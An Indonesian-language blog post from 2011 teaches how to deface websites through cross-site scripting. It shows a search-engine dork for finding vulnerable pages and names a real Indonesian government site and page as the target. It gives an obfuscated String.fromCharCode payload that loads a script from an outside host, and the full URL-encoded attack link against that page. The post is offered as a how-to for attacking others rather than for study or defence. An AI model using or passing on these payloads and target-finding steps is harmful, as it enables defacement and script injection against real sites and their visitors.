lets try this step
1. Open google
2. try this dork inurl:/news.php?id=
3. masukin dork tadi k searh google n enter
4. maka akan keluar banyak website hasil search google dengan memakai dork tadi
5. pilih beberapa webiste... ex arrow http://www.bakorkamla.go.id/
6. hasil dari searh pake dork tersebut saya menemukan bisa injek xss pada page ini arrow http://www.bakorkamla.go.id/news.php?id=595
seep sekarang tinggal nyoba cari injeksnya dimana
1. ada xss yang bisa di injeks melalui url n pada bagian search
2. ada xss yang bisa di injeks pada bagian search engine dari webtersebut
3. n ada website yang bisa di injeks melalui box coment,box buku tamu n all (yang penting intinya jika padasebuah website tersebut suport tag html, klw saa pribadi n juga hasil pembeljaran yang di ajrin barada suarabaya getar haxor cor kocor bocor,, xixixii,,, saya ngetest nya dengan tag Html seperti ini test n coba lihat hasilnya apabila tulisan tersebut hasilnya test menjadi tebal atau bold
so itu artinya web tersebut bisa kita injek xss.. n jika berhasil itu nmnya kata2 empu2 yang ajrin saya nmnya XSS Persistent
ok saya rasa cukup dengan keterangan di atas, mari kita lanjut dengan hasil yang saya dapat tadi pada halaman web ini http://www.bakorkamla.go.id/news.php?id=595
coba perhatikan websitenya ...
1. tidak ada Box coment or sebuah box untk memungkinkan seorang Viewer web untuk meninggalkan komentar..
2. coba kita lihat pada box searh pada website tersebut.. juga gak ada..
3. ok sepertinya jalan satu satunya coba kita injeks pada bagian url..
nah lo crnya gmn??? ok kita bahas crnya :
1. sediakan sebuah halaman deface kamu misalnya dalam bentuk html or php.
ex arrow http://nama hostinga kamu .php or html
2. sekarang bukak http://www.wocares.com/noquote.php
3. masukin url php or html deface kamu k script ini
4. copas tadi k web ini http://www.wocares.com/noquote.php
5. centang bagian Javascript (String.fromCharCode, unescape) n klik submit
ok maka qm akan mendapatkan hasil dari generate js qm tadi seperti ini
<script id=Alexrockr>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,111,99,111,110,103,46,110,111,97,100,115,46,98,105,122,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62));</script>
ok sekarang mari kita coba injeks pada bagian urlnya..
copas hasil geberate tadi k bagian paling belakang dari website tersebut, n jangan lupa di tambahkan token seperti ini ' or "
dengan dilanjutkan dengan hasil generate tadi n tekan ENTER pada keyboard Mu
maka jadinya seperti ini
http://www.bakorkamla.go.id/news.php?id=595%27%3Cscript%20id=Alexrockr%3Edocument.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,111,99,111,110,103,46,110,111,97,100,115,46,98,105,122,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62%29%29;%3C/script%3E
seep berhasil,, nah itu nmnya xss none persitent, bgtho kata aKa
surabaya getar saaat saya bertapa sama beliau.. hehehe seep segitu aj
dari saya saat ini,mohon maap dengan segala kekurangan,
friends
Sabtu, 05 Maret 2011
Hack site with XSS
Langganan:
Posting Komentar (Atom)
Mengenai Saya
- Prasasti Maya
- saya hanyalah seseorang yang mencari sesuatu yang orang bisa dan aq belum bisa,mengapa orang bisa dan aq gak bisa,dan aq pasti bisa jika aq tekun,dan saya akan berbagi ap yang saya bisa kepda teman-teman yang belum bisa,sebisa apa yang saya bisa bagikan.. ^_^
Tidak ada komentar:
Posting Komentar